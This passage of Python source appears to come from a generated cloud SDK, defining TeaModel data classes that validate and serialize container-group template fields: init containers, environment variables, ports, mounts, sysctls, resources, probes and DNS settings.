    def __init__(self, name=None, value=None, value_from=None):
        self.name = name
        self.value = value
        self.value_from = value_from
    def validate(self):
        """All fields are required; the value source validates recursively."""
        self.validate_required(self.name, 'name')
        self.validate_required(self.value, 'value')
        self.validate_required(self.value_from, 'value_from')
        if self.value_from:
            self.value_from.validate()
    def to_map(self):
        """Serialize to a wire-format dict; the source serializes recursively."""
        return {
            'Name': self.name,
            'Value': self.value,
            'ValueFrom': self.value_from.to_map() if self.value_from is not None else None,
        }
    def from_map(self, map={}):
        """Populate fields (including the nested source) from a wire dict; return self."""
        self.name = map.get('Name')
        self.value = map.get('Value')
        value_from_map = map.get('ValueFrom')
        self.value_from = (
            ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnvValueFrom().from_map(value_from_map)
            if value_from_map is not None else None)
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersPorts(TeaModel):
    """A port exposed by an init container: name, protocol and container port."""
    def __init__(self, name=None, protocol=None, container_port=None):
        self.name = name
        self.protocol = protocol
        self.container_port = container_port
    def validate(self):
        """All three fields are required."""
        for value, label in ((self.name, 'name'),
                             (self.protocol, 'protocol'),
                             (self.container_port, 'container_port')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'Name': self.name,
            'Protocol': self.protocol,
            'ContainerPort': self.container_port,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.name = map.get('Name')
        self.protocol = map.get('Protocol')
        self.container_port = map.get('ContainerPort')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersVolumeMounts(TeaModel):
    """A volume mount of an init container: name, sub-path, mount path, read-only flag."""
    def __init__(self, name=None, sub_path=None, mount_path=None, read_only=None):
        self.name = name
        self.sub_path = sub_path
        self.mount_path = mount_path
        self.read_only = read_only
    def validate(self):
        """All four fields are required."""
        for value, label in ((self.name, 'name'),
                             (self.sub_path, 'sub_path'),
                             (self.mount_path, 'mount_path'),
                             (self.read_only, 'read_only')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'Name': self.name,
            'SubPath': self.sub_path,
            'MountPath': self.mount_path,
            'ReadOnly': self.read_only,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.name = map.get('Name')
        self.sub_path = map.get('SubPath')
        self.mount_path = map.get('MountPath')
        self.read_only = map.get('ReadOnly')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContextSysctls(TeaModel):
    """A single sysctl name/value pair in an init container's security context."""
    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value
    def validate(self):
        """Name and value are both required."""
        for value, label in ((self.name, 'name'), (self.value, 'value')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'Name': self.name, 'Value': self.value}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.name = map.get('Name')
        self.value = map.get('Value')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContext(TeaModel):
    """Security context of an init container: a list of sysctl settings.

    Fix: the ``sysctls`` constructor argument was previously ignored (the
    attribute was unconditionally reset to ``[]``); it is now honored.
    """
    def __init__(self, sysctls=None):
        # List of ...SecurityContextSysctls models.
        self.sysctls = sysctls if sysctls is not None else []
    def validate(self):
        """Check the list is present and validate each entry recursively."""
        self.validate_required(self.sysctls, 'sysctls')
        if self.sysctls:
            for k in self.sysctls:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a wire-format dict; entries are serialized recursively."""
        result = {}
        if self.sysctls is not None:
            result['Sysctls'] = [k.to_map() if k else None for k in self.sysctls]
        else:
            result['Sysctls'] = None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fixed)."""
        map = map or {}
        if map.get('Sysctls') is not None:
            self.sysctls = [
                ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContextSysctls().from_map(k)
                for k in map.get('Sysctls')
            ]
        else:
            self.sysctls = None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainersResources(TeaModel):
    """Resource request of an init container (CPU and memory)."""
    def __init__(self, cpu=None, memory=None):
        self.cpu = cpu
        self.memory = memory
    def validate(self):
        """Both resource amounts are required."""
        for value, label in ((self.cpu, 'cpu'), (self.memory, 'memory')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'Cpu': self.cpu, 'Memory': self.memory}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecInitContainers(TeaModel):
    """An init container of an exported template: image settings, env, ports,
    mounts, security context, resources, command and args.

    Fix: the ``env``, ``ports``, ``volume_mounts``, ``command`` and ``args``
    constructor arguments were previously ignored (the attributes were
    unconditionally reset to ``[]``); they are now honored.
    """
    def __init__(self, name=None, image=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, working_dir=None, env=None, ports=None, volume_mounts=None, security_context=None, resources=None, command=None, args=None):
        self.name = name
        self.image = image
        self.image_pull_policy = image_pull_policy
        self.stdin = stdin
        self.stdin_once = stdin_once
        self.tty = tty
        self.working_dir = working_dir
        # Lists of nested models (Env/Ports/VolumeMounts) and of plain strings
        # (command/args); each defaults to an empty list.
        self.env = env if env is not None else []
        self.ports = ports if ports is not None else []
        self.volume_mounts = volume_mounts if volume_mounts is not None else []
        self.security_context = security_context
        self.resources = resources
        self.command = command if command is not None else []
        self.args = args if args is not None else []
    def validate(self):
        """Check required fields and recursively validate nested models."""
        self.validate_required(self.name, 'name')
        self.validate_required(self.image, 'image')
        self.validate_required(self.image_pull_policy, 'image_pull_policy')
        self.validate_required(self.stdin, 'stdin')
        self.validate_required(self.stdin_once, 'stdin_once')
        self.validate_required(self.tty, 'tty')
        self.validate_required(self.working_dir, 'working_dir')
        self.validate_required(self.env, 'env')
        if self.env:
            for k in self.env:
                if k:
                    k.validate()
        self.validate_required(self.ports, 'ports')
        if self.ports:
            for k in self.ports:
                if k:
                    k.validate()
        self.validate_required(self.volume_mounts, 'volume_mounts')
        if self.volume_mounts:
            for k in self.volume_mounts:
                if k:
                    k.validate()
        self.validate_required(self.security_context, 'security_context')
        if self.security_context:
            self.security_context.validate()
        self.validate_required(self.resources, 'resources')
        if self.resources:
            self.resources.validate()
        self.validate_required(self.command, 'command')
        self.validate_required(self.args, 'args')
    def to_map(self):
        """Serialize to a wire-format dict; nested models serialize recursively."""
        result = {}
        result['Name'] = self.name
        result['Image'] = self.image
        result['ImagePullPolicy'] = self.image_pull_policy
        result['Stdin'] = self.stdin
        result['StdinOnce'] = self.stdin_once
        result['Tty'] = self.tty
        result['WorkingDir'] = self.working_dir
        if self.env is not None:
            result['Env'] = [k.to_map() if k else None for k in self.env]
        else:
            result['Env'] = None
        if self.ports is not None:
            result['Ports'] = [k.to_map() if k else None for k in self.ports]
        else:
            result['Ports'] = None
        if self.volume_mounts is not None:
            result['VolumeMounts'] = [k.to_map() if k else None for k in self.volume_mounts]
        else:
            result['VolumeMounts'] = None
        result['SecurityContext'] = (self.security_context.to_map()
                                     if self.security_context is not None else None)
        result['Resources'] = self.resources.to_map() if self.resources is not None else None
        # command/args hold plain strings, so they are copied as-is.
        result['Command'] = list(self.command) if self.command is not None else None
        result['Args'] = list(self.args) if self.args is not None else None
        return result
    def from_map(self, map=None):
        """Populate from a wire-format dict and return self (mutable-default fixed)."""
        map = map or {}
        self.name = map.get('Name')
        self.image = map.get('Image')
        self.image_pull_policy = map.get('ImagePullPolicy')
        self.stdin = map.get('Stdin')
        self.stdin_once = map.get('StdinOnce')
        self.tty = map.get('Tty')
        self.working_dir = map.get('WorkingDir')
        if map.get('Env') is not None:
            self.env = [
                ExportContainerGroupTemplateResponseTemplateSpecInitContainersEnv().from_map(k)
                for k in map.get('Env')
            ]
        else:
            self.env = None
        if map.get('Ports') is not None:
            self.ports = [
                ExportContainerGroupTemplateResponseTemplateSpecInitContainersPorts().from_map(k)
                for k in map.get('Ports')
            ]
        else:
            self.ports = None
        if map.get('VolumeMounts') is not None:
            self.volume_mounts = [
                ExportContainerGroupTemplateResponseTemplateSpecInitContainersVolumeMounts().from_map(k)
                for k in map.get('VolumeMounts')
            ]
        else:
            self.volume_mounts = None
        if map.get('SecurityContext') is not None:
            temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersSecurityContext()
            self.security_context = temp_model.from_map(map['SecurityContext'])
        else:
            self.security_context = None
        if map.get('Resources') is not None:
            temp_model = ExportContainerGroupTemplateResponseTemplateSpecInitContainersResources()
            self.resources = temp_model.from_map(map['Resources'])
        else:
            self.resources = None
        self.command = list(map.get('Command')) if map.get('Command') is not None else None
        self.args = list(map.get('Args')) if map.get('Args') is not None else None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFromFieldRef(TeaModel):
    """A field reference used as an env-var source (regular containers)."""
    def __init__(self, field_path=None):
        self.field_path = field_path
    def validate(self):
        """The field path is required."""
        self.validate_required(self.field_path, 'field_path')
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {'FieldPath': self.field_path}
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.field_path = map.get('FieldPath')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFrom(TeaModel):
    """An env-var value source wrapping a field reference (regular containers)."""
    def __init__(self, field_ref=None):
        self.field_ref = field_ref
    def validate(self):
        """The field reference is required and validated recursively."""
        self.validate_required(self.field_ref, 'field_ref')
        if self.field_ref:
            self.field_ref.validate()
    def to_map(self):
        """Serialize to a wire-format dict; the reference serializes recursively."""
        return {'FieldRef': self.field_ref.to_map() if self.field_ref is not None else None}
    def from_map(self, map={}):
        """Populate the nested reference from a wire dict; return self."""
        field_ref_map = map.get('FieldRef')
        self.field_ref = (
            ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFromFieldRef().from_map(field_ref_map)
            if field_ref_map is not None else None)
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersEnv(TeaModel):
    """An environment variable of a container: name, literal value, or source."""
    def __init__(self, name=None, value=None, value_from=None):
        self.name = name
        self.value = value
        self.value_from = value_from
    def validate(self):
        """All fields are required; the value source validates recursively."""
        self.validate_required(self.name, 'name')
        self.validate_required(self.value, 'value')
        self.validate_required(self.value_from, 'value_from')
        if self.value_from:
            self.value_from.validate()
    def to_map(self):
        """Serialize to a wire-format dict; the source serializes recursively."""
        return {
            'Name': self.name,
            'Value': self.value,
            'ValueFrom': self.value_from.to_map() if self.value_from is not None else None,
        }
    def from_map(self, map={}):
        """Populate fields (including the nested source) from a wire dict; return self."""
        self.name = map.get('Name')
        self.value = map.get('Value')
        value_from_map = map.get('ValueFrom')
        self.value_from = (
            ExportContainerGroupTemplateResponseTemplateSpecContainersEnvValueFrom().from_map(value_from_map)
            if value_from_map is not None else None)
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersPorts(TeaModel):
    """A port exposed by a container: name, protocol and container port."""
    def __init__(self, name=None, protocol=None, container_port=None):
        self.name = name
        self.protocol = protocol
        self.container_port = container_port
    def validate(self):
        """All three fields are required."""
        for value, label in ((self.name, 'name'),
                             (self.protocol, 'protocol'),
                             (self.container_port, 'container_port')):
            self.validate_required(value, label)
    def to_map(self):
        """Serialize to a wire-format dict."""
        return {
            'Name': self.name,
            'Protocol': self.protocol,
            'ContainerPort': self.container_port,
        }
    def from_map(self, map={}):
        """Populate fields from a wire-format dict and return self."""
        self.name = map.get('Name')
        self.protocol = map.get('Protocol')
        self.container_port = map.get('ContainerPort')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersVolumeMounts(TeaModel):
    """A volume mount of a container in the exported template."""
    def __init__(self, name=None, sub_path=None, mount_path=None, read_only=None):
        self.name = name
        self.sub_path = sub_path
        self.mount_path = mount_path
        self.read_only = read_only
    def validate(self):
        """All four fields are required."""
        for val, label in ((self.name, 'name'),
                           (self.sub_path, 'sub_path'),
                           (self.mount_path, 'mount_path'),
                           (self.read_only, 'read_only')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {
            'Name': self.name,
            'SubPath': self.sub_path,
            'MountPath': self.mount_path,
            'ReadOnly': self.read_only,
        }
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.name = map.get('Name')
        self.sub_path = map.get('SubPath')
        self.mount_path = map.get('MountPath')
        self.read_only = map.get('ReadOnly')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContextSysctls(TeaModel):
    """A single sysctl name/value pair of a container security context."""
    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value
    def validate(self):
        """Both fields are required."""
        for val, label in ((self.name, 'name'), (self.value, 'value')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Name': self.name, 'Value': self.value}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.name = map.get('Name')
        self.value = map.get('Value')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContext(TeaModel):
    """Container-level security context: a list of sysctl settings."""
    def __init__(self, sysctls=None):
        # Bug fix: the constructor previously ignored the ``sysctls``
        # argument and always assigned []. Keep [] as the default so a
        # bare instance still serializes to {'Sysctls': []}.
        self.sysctls = [] if sysctls is None else sysctls
    def validate(self):
        """Require sysctls; validate each non-empty entry."""
        self.validate_required(self.sysctls, 'sysctls')
        if self.sysctls:
            for k in self.sysctls:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a plain dict; a None list maps to None."""
        result = {}
        result['Sysctls'] = []
        if self.sysctls is not None:
            for k in self.sysctls:
                result['Sysctls'].append(k.to_map() if k else None)
        else:
            result['Sysctls'] = None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        self.sysctls = []
        if map.get('Sysctls') is not None:
            for k in map.get('Sysctls'):
                temp_model = ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContextSysctls()
                self.sysctls.append(temp_model.from_map(k))
        else:
            self.sysctls = None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersResources(TeaModel):
    """Resource (CPU/memory) settings of a container in the exported template."""
    def __init__(self, cpu=None, memory=None):
        self.cpu = cpu
        self.memory = memory
    def validate(self):
        """Both fields are required."""
        for val, label in ((self.cpu, 'cpu'), (self.memory, 'memory')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Cpu': self.cpu, 'Memory': self.memory}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeExec(TeaModel):
    """Exec action of a readiness probe: the command line to run."""
    def __init__(self, command=None):
        # Bug fix: the ``command`` argument was previously ignored and
        # self.command was always reset to []. Keep [] as the default.
        self.command = [] if command is None else command
    def validate(self):
        """The command list is required."""
        self.validate_required(self.command, 'command')
    def to_map(self):
        """Serialize to a plain dict; a None list maps to None."""
        result = {}
        result['Command'] = []
        if self.command is not None:
            for k in self.command:
                result['Command'].append(k)
        else:
            result['Command'] = None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        if map.get('Command') is not None:
            # Copy into a fresh list, matching the original append loop.
            self.command = list(map.get('Command'))
        else:
            self.command = None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeTcpSocket(TeaModel):
    """TCP-socket action of a readiness probe: the port to connect to."""
    def __init__(self, port=None):
        self.port = port
    def validate(self):
        """The port is required."""
        self.validate_required(self.port, 'port')
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Port': self.port}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.port = map.get('Port')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeHttpGet(TeaModel):
    """HTTP GET action of a readiness probe."""
    def __init__(self, scheme=None, path=None, port=None):
        self.scheme = scheme
        self.path = path
        self.port = port
    def validate(self):
        """All three fields are required."""
        for val, label in ((self.scheme, 'scheme'), (self.path, 'path'), (self.port, 'port')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Scheme': self.scheme, 'Path': self.path, 'Port': self.port}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.scheme = map.get('Scheme')
        self.path = map.get('Path')
        self.port = map.get('Port')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbe(TeaModel):
    """Readiness-probe settings of a container in the exported template."""
    def __init__(self, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None, http_get=None):
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.timeout_seconds = timeout_seconds
        self.exec = exec  # NOTE: name mandated by the wire format; shadows builtin exec
        self.tcp_socket = tcp_socket
        self.http_get = http_get
    def validate(self):
        """Require every field; recurse into the three action sub-models."""
        for val, label in ((self.initial_delay_seconds, 'initial_delay_seconds'),
                           (self.period_seconds, 'period_seconds'),
                           (self.success_threshold, 'success_threshold'),
                           (self.failure_threshold, 'failure_threshold'),
                           (self.timeout_seconds, 'timeout_seconds')):
            self.validate_required(val, label)
        for sub, label in ((self.exec, 'exec'),
                           (self.tcp_socket, 'tcp_socket'),
                           (self.http_get, 'http_get')):
            self.validate_required(sub, label)
            if sub:
                sub.validate()
    def to_map(self):
        """Serialize to a plain dict; unset sub-models map to None."""
        result = {
            'InitialDelaySeconds': self.initial_delay_seconds,
            'PeriodSeconds': self.period_seconds,
            'SuccessThreshold': self.success_threshold,
            'FailureThreshold': self.failure_threshold,
            'TimeoutSeconds': self.timeout_seconds,
        }
        result['Exec'] = self.exec.to_map() if self.exec is not None else None
        result['TcpSocket'] = self.tcp_socket.to_map() if self.tcp_socket is not None else None
        result['HttpGet'] = self.http_get.to_map() if self.http_get is not None else None
        return result
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        self.timeout_seconds = map.get('TimeoutSeconds')
        raw = map.get('Exec')
        self.exec = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeExec().from_map(raw) if raw is not None else None
        raw = map.get('TcpSocket')
        self.tcp_socket = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeTcpSocket().from_map(raw) if raw is not None else None
        raw = map.get('HttpGet')
        self.http_get = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbeHttpGet().from_map(raw) if raw is not None else None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeExec(TeaModel):
    """Exec action of a liveness probe: the command line to run."""
    def __init__(self, command=None):
        # Bug fix: the ``command`` argument was previously ignored and
        # self.command was always reset to []. Keep [] as the default.
        self.command = [] if command is None else command
    def validate(self):
        """The command list is required."""
        self.validate_required(self.command, 'command')
    def to_map(self):
        """Serialize to a plain dict; a None list maps to None."""
        result = {}
        result['Command'] = []
        if self.command is not None:
            for k in self.command:
                result['Command'].append(k)
        else:
            result['Command'] = None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        if map.get('Command') is not None:
            # Copy into a fresh list, matching the original append loop.
            self.command = list(map.get('Command'))
        else:
            self.command = None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeTcpSocket(TeaModel):
    """TCP-socket action of a liveness probe: the port to connect to."""
    def __init__(self, port=None):
        self.port = port
    def validate(self):
        """The port is required."""
        self.validate_required(self.port, 'port')
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Port': self.port}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.port = map.get('Port')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeHttpGet(TeaModel):
    """HTTP GET action of a liveness probe."""
    def __init__(self, scheme=None, path=None, port=None):
        self.scheme = scheme
        self.path = path
        self.port = port
    def validate(self):
        """All three fields are required."""
        for val, label in ((self.scheme, 'scheme'), (self.path, 'path'), (self.port, 'port')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Scheme': self.scheme, 'Path': self.path, 'Port': self.port}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.scheme = map.get('Scheme')
        self.path = map.get('Path')
        self.port = map.get('Port')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbe(TeaModel):
    """Liveness-probe settings of a container in the exported template."""
    def __init__(self, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None, http_get=None):
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.timeout_seconds = timeout_seconds
        self.exec = exec  # NOTE: name mandated by the wire format; shadows builtin exec
        self.tcp_socket = tcp_socket
        self.http_get = http_get
    def validate(self):
        """Require every field; recurse into the three action sub-models."""
        for val, label in ((self.initial_delay_seconds, 'initial_delay_seconds'),
                           (self.period_seconds, 'period_seconds'),
                           (self.success_threshold, 'success_threshold'),
                           (self.failure_threshold, 'failure_threshold'),
                           (self.timeout_seconds, 'timeout_seconds')):
            self.validate_required(val, label)
        for sub, label in ((self.exec, 'exec'),
                           (self.tcp_socket, 'tcp_socket'),
                           (self.http_get, 'http_get')):
            self.validate_required(sub, label)
            if sub:
                sub.validate()
    def to_map(self):
        """Serialize to a plain dict; unset sub-models map to None."""
        result = {
            'InitialDelaySeconds': self.initial_delay_seconds,
            'PeriodSeconds': self.period_seconds,
            'SuccessThreshold': self.success_threshold,
            'FailureThreshold': self.failure_threshold,
            'TimeoutSeconds': self.timeout_seconds,
        }
        result['Exec'] = self.exec.to_map() if self.exec is not None else None
        result['TcpSocket'] = self.tcp_socket.to_map() if self.tcp_socket is not None else None
        result['HttpGet'] = self.http_get.to_map() if self.http_get is not None else None
        return result
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        self.timeout_seconds = map.get('TimeoutSeconds')
        raw = map.get('Exec')
        self.exec = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeExec().from_map(raw) if raw is not None else None
        raw = map.get('TcpSocket')
        self.tcp_socket = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeTcpSocket().from_map(raw) if raw is not None else None
        raw = map.get('HttpGet')
        self.http_get = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbeHttpGet().from_map(raw) if raw is not None else None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecContainers(TeaModel):
    """A container entry of the exported container-group template spec."""
    def __init__(self, name=None, image=None, image_pull_policy=None, stdin=None, stdin_once=None, tty=None, working_dir=None, env=None, ports=None, volume_mounts=None, security_context=None, resources=None, readiness_probe=None, liveness_probe=None, command=None, args=None):
        self.name = name
        self.image = image
        self.image_pull_policy = image_pull_policy
        self.stdin = stdin
        self.stdin_once = stdin_once
        self.tty = tty
        self.working_dir = working_dir
        # Bug fix: the list-typed arguments (env, ports, volume_mounts,
        # command, args) were previously ignored and always reset to [].
        # Keep [] as the default so a bare instance behaves as before.
        self.env = [] if env is None else env
        self.ports = [] if ports is None else ports
        self.volume_mounts = [] if volume_mounts is None else volume_mounts
        self.security_context = security_context
        self.resources = resources
        self.readiness_probe = readiness_probe
        self.liveness_probe = liveness_probe
        self.command = [] if command is None else command
        self.args = [] if args is None else args
    def validate(self):
        """Require every field; recurse into list entries and sub-models."""
        self.validate_required(self.name, 'name')
        self.validate_required(self.image, 'image')
        self.validate_required(self.image_pull_policy, 'image_pull_policy')
        self.validate_required(self.stdin, 'stdin')
        self.validate_required(self.stdin_once, 'stdin_once')
        self.validate_required(self.tty, 'tty')
        self.validate_required(self.working_dir, 'working_dir')
        self.validate_required(self.env, 'env')
        if self.env:
            for k in self.env:
                if k:
                    k.validate()
        self.validate_required(self.ports, 'ports')
        if self.ports:
            for k in self.ports:
                if k:
                    k.validate()
        self.validate_required(self.volume_mounts, 'volume_mounts')
        if self.volume_mounts:
            for k in self.volume_mounts:
                if k:
                    k.validate()
        self.validate_required(self.security_context, 'security_context')
        if self.security_context:
            self.security_context.validate()
        self.validate_required(self.resources, 'resources')
        if self.resources:
            self.resources.validate()
        self.validate_required(self.readiness_probe, 'readiness_probe')
        if self.readiness_probe:
            self.readiness_probe.validate()
        self.validate_required(self.liveness_probe, 'liveness_probe')
        if self.liveness_probe:
            self.liveness_probe.validate()
        self.validate_required(self.command, 'command')
        self.validate_required(self.args, 'args')
    def to_map(self):
        """Serialize to a plain dict; None lists/sub-models map to None."""
        result = {}
        result['Name'] = self.name
        result['Image'] = self.image
        result['ImagePullPolicy'] = self.image_pull_policy
        result['Stdin'] = self.stdin
        result['StdinOnce'] = self.stdin_once
        result['Tty'] = self.tty
        result['WorkingDir'] = self.working_dir
        result['Env'] = [k.to_map() if k else None for k in self.env] if self.env is not None else None
        result['Ports'] = [k.to_map() if k else None for k in self.ports] if self.ports is not None else None
        result['VolumeMounts'] = [k.to_map() if k else None for k in self.volume_mounts] if self.volume_mounts is not None else None
        result['SecurityContext'] = self.security_context.to_map() if self.security_context is not None else None
        result['Resources'] = self.resources.to_map() if self.resources is not None else None
        result['ReadinessProbe'] = self.readiness_probe.to_map() if self.readiness_probe is not None else None
        result['LivenessProbe'] = self.liveness_probe.to_map() if self.liveness_probe is not None else None
        result['Command'] = list(self.command) if self.command is not None else None
        result['Args'] = list(self.args) if self.args is not None else None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        self.name = map.get('Name')
        self.image = map.get('Image')
        self.image_pull_policy = map.get('ImagePullPolicy')
        self.stdin = map.get('Stdin')
        self.stdin_once = map.get('StdinOnce')
        self.tty = map.get('Tty')
        self.working_dir = map.get('WorkingDir')
        if map.get('Env') is not None:
            self.env = [ExportContainerGroupTemplateResponseTemplateSpecContainersEnv().from_map(k) for k in map.get('Env')]
        else:
            self.env = None
        if map.get('Ports') is not None:
            self.ports = [ExportContainerGroupTemplateResponseTemplateSpecContainersPorts().from_map(k) for k in map.get('Ports')]
        else:
            self.ports = None
        if map.get('VolumeMounts') is not None:
            self.volume_mounts = [ExportContainerGroupTemplateResponseTemplateSpecContainersVolumeMounts().from_map(k) for k in map.get('VolumeMounts')]
        else:
            self.volume_mounts = None
        if map.get('SecurityContext') is not None:
            self.security_context = ExportContainerGroupTemplateResponseTemplateSpecContainersSecurityContext().from_map(map['SecurityContext'])
        else:
            self.security_context = None
        if map.get('Resources') is not None:
            self.resources = ExportContainerGroupTemplateResponseTemplateSpecContainersResources().from_map(map['Resources'])
        else:
            self.resources = None
        if map.get('ReadinessProbe') is not None:
            self.readiness_probe = ExportContainerGroupTemplateResponseTemplateSpecContainersReadinessProbe().from_map(map['ReadinessProbe'])
        else:
            self.readiness_probe = None
        if map.get('LivenessProbe') is not None:
            self.liveness_probe = ExportContainerGroupTemplateResponseTemplateSpecContainersLivenessProbe().from_map(map['LivenessProbe'])
        else:
            self.liveness_probe = None
        self.command = list(map.get('Command')) if map.get('Command') is not None else None
        self.args = list(map.get('Args')) if map.get('Args') is not None else None
        return self
class ExportContainerGroupTemplateResponseTemplateSpecDnsConfigOptions(TeaModel):
    """One DNS-resolver option (name/value) of the template spec."""
    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value
    def validate(self):
        """Both fields are required."""
        for val, label in ((self.name, 'name'), (self.value, 'value')):
            self.validate_required(val, label)
    def to_map(self):
        """Serialize to a plain dict."""
        return {'Name': self.name, 'Value': self.value}
    def from_map(self, map={}):
        """Populate from a plain dict and return self."""
        self.name = map.get('Name')
        self.value = map.get('Value')
        return self
class ExportContainerGroupTemplateResponseTemplateSpecDnsConfig(TeaModel):
    """DNS configuration of the template spec: options, name servers, search domains."""
    def __init__(self, options=None, name_servers=None, searches=None):
        # Bug fix: all three list arguments were previously ignored and the
        # attributes always reset to []. Keep [] as the default.
        self.options = [] if options is None else options
        self.name_servers = [] if name_servers is None else name_servers
        self.searches = [] if searches is None else searches
    def validate(self):
        """Require every field; validate each option entry."""
        self.validate_required(self.options, 'options')
        if self.options:
            for k in self.options:
                if k:
                    k.validate()
        self.validate_required(self.name_servers, 'name_servers')
        self.validate_required(self.searches, 'searches')
    def to_map(self):
        """Serialize to a plain dict; None lists map to None."""
        result = {}
        result['Options'] = []
        if self.options is not None:
            for k in self.options:
                result['Options'].append(k.to_map() if k else None)
        else:
            result['Options'] = None
        result['NameServers'] = list(self.name_servers) if self.name_servers is not None else None
        result['Searches'] = list(self.searches) if self.searches is not None else None
        return result
    def from_map(self, map=None):
        """Populate from a plain dict and return self."""
        # Avoid the mutable-default-argument pitfall of the original.
        if map is None:
            map = {}
        self.options = []
        if map.get('Options') is not None:
            for k in map.get('Options'):
                temp_model = ExportContainerGroupTemplateResponseTemplateSpecDnsConfigOptions()
                self.options.append(temp_model.from_map(k))
        else:
            self.options = None
        self.name_servers = list(map.get('NameServers')) if map.get('NameServers') is not None else None
